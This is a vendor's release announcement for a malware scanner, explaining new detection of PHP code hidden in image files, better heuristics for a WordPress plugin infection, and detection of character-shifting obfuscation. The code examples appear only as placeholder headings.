Today we are proud to announce our next major release 1.25.0.

What has changed?

We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a wide-spread tactic of attackers to hide malicious PHP code inside of image files that either contain dummy image data or no image data at all.

For example:

Example 1

This short eval (evil!) code snippet would raise attention fast when found in a PHP file. But what if it is stored as statistics.gif and then there is this in the main php file:

Example 2

Those lines of code are often overread when searching for obvious infections.

Furthermore we improved some heuristic rules for malware scans, including our "Level-4-Scan" that is executed by using the --db-scan switch. E.g. it recognizes some hints of the currently wide-spread infection of WordPress instances by "Trollherten" through a security issue in the WP GDPR Compliance plugin (you sould update to latest version asap, by the way).

Malware example

There is a new type of malware that raised our attention that hides it's malicious behaviour by shifting characters. Here is some simplified dummy code:

Example 3

This is nothing else but

Example 4

or even simpler

Example 5

New major release of ISPProtect Malware Scanner